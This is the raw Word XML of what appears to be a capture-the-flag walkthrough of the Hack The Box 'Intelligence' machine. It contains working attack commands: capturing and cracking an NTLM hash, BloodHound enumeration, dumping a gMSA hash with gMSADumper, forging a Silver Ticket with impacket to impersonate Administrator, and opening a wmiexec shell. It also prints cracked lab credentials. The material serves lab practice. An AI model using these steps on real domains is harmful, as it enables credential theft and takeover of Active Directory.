        <w:t xml:space="preserve"> 10.10.10.248</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A2786" w:rsidRDefault="00F4202F" w:rsidP="000A2786">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="621774BA" wp14:editId="72D8ADEE">
            <wp:extent cx="5943600" cy="6565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2F" w:rsidRDefault="00F4202F" w:rsidP="000A2786"/>
    <w:p w:rsidR="00662C48" w:rsidRDefault="00F6253E" w:rsidP="000A2786">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
        <w:t>Now we our record in DNS so let's wait for hash in responder. Note this may take up to 5 mins so be patient.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB76E9" w:rsidRDefault="004A2615" w:rsidP="000A2786">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D7A2FDA" wp14:editId="706AFBF2">
            <wp:extent cx="5943600" cy="1051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E9" w:rsidRPr="00EB76E9" w:rsidRDefault="00EB76E9" w:rsidP="00EB76E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB76E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>┌──</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB76E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
        <w:t>(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB76E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
        <w:t>💀</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB76E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB76E9" w:rsidRPr="00EB76E9" w:rsidRDefault="00EB76E9" w:rsidP="00EB76E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB76E9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
        <w:t>└─</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB76E9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="C9D1D9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="0D1117"/>
        </w:rPr>
        <w:t># cat hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6253E" w:rsidRDefault="00054155" w:rsidP="000A2786">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14B2916B" wp14:editId="317EE439">
            <wp:extent cx="5943600" cy="3981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55" w:rsidRDefault="00054155" w:rsidP="000A2786"/>
    <w:p w:rsidR="00BD0433" w:rsidRDefault="00BD0433" w:rsidP="000A2786"/>
    <w:p w:rsidR="00BF3393" w:rsidRDefault="00BF3393" w:rsidP="00BF3393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662C48" w:rsidRDefault="00BF3393" w:rsidP="00BF3393">
      <w:r>
        <w:t>└─# john hash --wordlist=rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3393" w:rsidRDefault="007E13D7" w:rsidP="00BF3393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="056A54A1" wp14:editId="679C97FA">
            <wp:extent cx="5943600" cy="11029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D7" w:rsidRDefault="007E13D7" w:rsidP="00BF3393">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="007E13D7">
        <w:t>Mr.Teddy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5193" w:rsidRPr="006B5193" w:rsidRDefault="006B5193" w:rsidP="006B519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212"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5193">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="121212"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username = Ted.Graves</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5193" w:rsidRDefault="006B5193" w:rsidP="006B519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212"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B5193">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="121212"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password = Mr.Teddy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B840BF" w:rsidRDefault="00B840BF" w:rsidP="006B519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212"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B840BF" w:rsidRDefault="00B840BF" w:rsidP="006B519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212"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B840BF" w:rsidRPr="00B840BF" w:rsidRDefault="00B840BF" w:rsidP="00B840B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21212"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B840BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="121212"/>
        </w:rPr>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r w:rsidRPr="00B840BF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="121212"/>
        </w:rPr>
        <w:t>💀</w:t>
      </w:r>
      <w:r w:rsidRPr="00B840BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="121212"/>
        </w:rPr>
        <w:t>kali)-[/home/kali/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B840BF" w:rsidRDefault="00B840BF" w:rsidP="00B840B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21212"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B840BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="121212"/>
        </w:rPr>
        <w:t>└─# crackmapexec smb 10.10.10.248 -u Ted.Graves -p 'Mr.Teddy'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B840BF" w:rsidRDefault="00A67069" w:rsidP="00B840B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21212"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="565B19B7" wp14:editId="11F6B5C1">
            <wp:extent cx="5943600" cy="3924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69" w:rsidRDefault="00A67069" w:rsidP="00B840B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21212"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA3724" w:rsidRPr="006B5193" w:rsidRDefault="00CA3724" w:rsidP="00B840B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21212"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005132A0" w:rsidRDefault="005132A0" w:rsidP="005132A0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/BloodHound.py]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E13D7" w:rsidRDefault="005132A0" w:rsidP="005132A0">
      <w:r>
        <w:t>└─# bloodhound-python -c all -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc dc.intelligence.htb -ns 10.10.10.248 --dns-timeout 60 -w 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005132A0" w:rsidRDefault="00517ADD" w:rsidP="005132A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66110F98" wp14:editId="78B96B32">
            <wp:extent cx="5943600" cy="1390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DD" w:rsidRDefault="00517ADD" w:rsidP="005132A0"/>
    <w:p w:rsidR="00FE0503" w:rsidRDefault="00FE0503" w:rsidP="005132A0"/>
    <w:p w:rsidR="00FE0503" w:rsidRDefault="00FE0503" w:rsidP="00FE0503">
      <w:r>
        <w:lastRenderedPageBreak/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/BloodHound.py]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB6FE2" w:rsidRDefault="00FE0503" w:rsidP="00FE0503">
      <w:r>
        <w:t>└─# neo4j console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0503" w:rsidRDefault="00FE0503" w:rsidP="00FE0503">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7708D3B4" wp14:editId="28D7242F">
            <wp:extent cx="5943600" cy="20281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03" w:rsidRDefault="00FE0503" w:rsidP="00FE0503"/>
    <w:p w:rsidR="00497A91" w:rsidRDefault="00497A91" w:rsidP="00FE0503">
      <w:r>
        <w:t>Reset the password from here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4441" w:rsidRDefault="00BF4441" w:rsidP="00BF4441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/krbrelayx]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0503" w:rsidRDefault="00BF4441" w:rsidP="00BF4441">
      <w:r>
        <w:t>└─# bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F4202F" w:rsidRDefault="00497A91" w:rsidP="00BF3393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15D73D98" wp14:editId="7BCFD4F8">
            <wp:extent cx="5943600" cy="27711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91" w:rsidRDefault="00F4451E" w:rsidP="00BF3393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66CED726" wp14:editId="5A883F64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1E" w:rsidRDefault="0038642F" w:rsidP="00BF3393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024A138F" wp14:editId="633F3DF1">
            <wp:extent cx="4914900" cy="4391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2F" w:rsidRDefault="00522DF3" w:rsidP="00BF3393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D07C99E" wp14:editId="1D4AEC2B">
            <wp:extent cx="5943600" cy="33661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3" w:rsidRDefault="00FE635D" w:rsidP="00BF3393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B87C133" wp14:editId="0EE4DD01">
            <wp:extent cx="5943600" cy="36404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A8" w:rsidRDefault="003A0FA8" w:rsidP="003A0FA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>As it is shown above, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>Ted.Graves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t> belongs to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>ITSupport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t> group. And the members of this group have the privilege to get the password of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>svc_int$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, which is a group managed service account (gMSA).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A0FA8" w:rsidRDefault="003A0FA8" w:rsidP="003A0FA8">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="HTMLCode"/>
            <w:color w:val="357EDD"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>gMSADumper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, we can obtain the NTLM hash of this service account:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5193" w:rsidRDefault="000C5A88" w:rsidP="00BF3393">
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidR="00295A51" w:rsidRPr="000251E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/micahvandeusen/gMSADumper</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000A573A" w:rsidRDefault="000A573A" w:rsidP="000A573A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295A51" w:rsidRDefault="000A573A" w:rsidP="000A573A">
      <w:r>
        <w:t xml:space="preserve">└─# git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="000251E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/micahvandeusen/gMSADumper.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000A573A" w:rsidRDefault="005934B2" w:rsidP="000A573A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="015AC81B" wp14:editId="436888EC">
            <wp:extent cx="5791200" cy="1533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4D" w:rsidRDefault="0042524D" w:rsidP="0042524D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/gMSADumper]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005934B2" w:rsidRDefault="0042524D" w:rsidP="0042524D">
      <w:r>
        <w:t>└─# python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0042524D" w:rsidRDefault="00DA45C6" w:rsidP="0042524D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D25B12C" wp14:editId="679A3B1F">
            <wp:extent cx="5943600" cy="7213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20" w:rsidRDefault="00761120" w:rsidP="00761120">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Now that we have the NTLM hash of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>svc_int$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>, it’s time to perform a Silver Ticket attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761120" w:rsidRDefault="00761120" w:rsidP="00761120">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>As in every Kerberos attack, first we must synchronize with the server (using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>ntpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>rdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA45C6" w:rsidRDefault="00DA45C6" w:rsidP="0042524D"/>
    <w:p w:rsidR="00957355" w:rsidRDefault="00957355" w:rsidP="00957355"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57355" w:rsidRDefault="00957355" w:rsidP="00957355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7E13D7" w:rsidRDefault="00957355" w:rsidP="00957355">
      <w:r>
        <w:t>└─# ntpdate 10.10.10.248</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957355" w:rsidRDefault="00BD71AE" w:rsidP="00957355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06C9C03A" wp14:editId="18FD76AB">
            <wp:extent cx="5943600" cy="5187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AE" w:rsidRDefault="00BD71AE" w:rsidP="00957355"/>
    <w:p w:rsidR="009F6376" w:rsidRDefault="009F6376" w:rsidP="00957355">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        </w:rPr>
        <w:t>And now we can obtain a Silver Ticket to impersonate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        </w:rPr>
        <w:t> using Impacket’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>getST.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inter" w:hAnsi="Inter"/>
          <w:color w:val="A9A9B3"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="2C3840"/>
        </w:rPr>
        <w:t> specifying the hash of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="A9A9B3"/>
        </w:rPr>
        <w:t>svc_int$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6376" w:rsidRDefault="009F6376" w:rsidP="00957355"/>
    <w:p w:rsidR="0040078A" w:rsidRDefault="0040078A" w:rsidP="0040078A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BD71AE" w:rsidRDefault="0040078A" w:rsidP="0040078A">
      <w:r>
        <w:t>└─# python3 /usr/share/doc/python3-impacket/examples/getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator -dc-ip 10.10.10.248 -hashes :b98d4cef68f72a98dfeed732d1b1abca intelligence.htb/svc_int$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040078A" w:rsidRDefault="00BD56E0" w:rsidP="0040078A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20B29892" wp14:editId="5E8F124B">
            <wp:extent cx="5943600" cy="6318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91" w:rsidRDefault="00424691" w:rsidP="00424691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BD56E0" w:rsidRDefault="00424691" w:rsidP="00424691">
      <w:r>
        <w:t>└─# export KRB5CCNAME=Administrator.ccache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00424691" w:rsidRDefault="00A3074F" w:rsidP="00424691">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19FA4FDD" wp14:editId="4184FB24">
            <wp:extent cx="3505200" cy="485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12" w:rsidRDefault="00E25312" w:rsidP="00E25312">
      <w:r>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>💀</w:t>
      </w:r>
      <w:r>
        <w:t>kali)-[/home/kali/Downloads]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3074F" w:rsidRDefault="00E25312" w:rsidP="00E25312">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:t xml:space="preserve">python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -k -no-pass -dc-ip 10.10.10.248 </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidRPr="003C48BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>intelligence.htb/Administrator@dc.intelligence.htb</w:t>
        </w:r>
      </w:hyperlink>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00E25312" w:rsidRDefault="00E25312" w:rsidP="00E25312"/>
    <w:p w:rsidR="00E25312" w:rsidRDefault="00E25312" w:rsidP="00E25312">
      <w:r w:rsidRPr="00E25312">
        <w:t>C:\&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E25312" w:rsidRDefault="00380FFF" w:rsidP="00E25312">
      <w:r w:rsidRPr="00380FFF">
        <w:t>C:\&gt;type C:\Users\Administrator\Desktop\root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00380FFF" w:rsidRDefault="00975AD7" w:rsidP="00E25312">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10193CC8" wp14:editId="282326E8">
            <wp:extent cx="5943600" cy="1010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D7" w:rsidRDefault="00975AD7" w:rsidP="00E25312"/>
    <w:sectPr w:rsidR="00975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88" w:rsidRDefault="000C5A88" w:rsidP="00966640">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000C5A88" w:rsidRDefault="000C5A88" w:rsidP="0096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88" w:rsidRDefault="000C5A88" w:rsidP="00966640">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="000C5A88" w:rsidRDefault="000C5A88" w:rsidP="0096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CF"/>
    <w:rsid w:val="00005A6D"/>
    <w:rsid w:val="00010EF1"/>
    <w:rsid w:val="00037069"/>
    <w:rsid w:val="00054155"/>
    <w:rsid w:val="00061D50"/>
    <w:rsid w:val="0009216A"/>
    <w:rsid w:val="0009715C"/>
    <w:rsid w:val="000A2786"/>
    <w:rsid w:val="000A573A"/>
    <w:rsid w:val="000B72E8"/>
    <w:rsid w:val="000C5A88"/>
    <w:rsid w:val="000F232D"/>
    <w:rsid w:val="00140F30"/>
    <w:rsid w:val="00143D59"/>
    <w:rsid w:val="00174417"/>
    <w:rsid w:val="001D39AA"/>
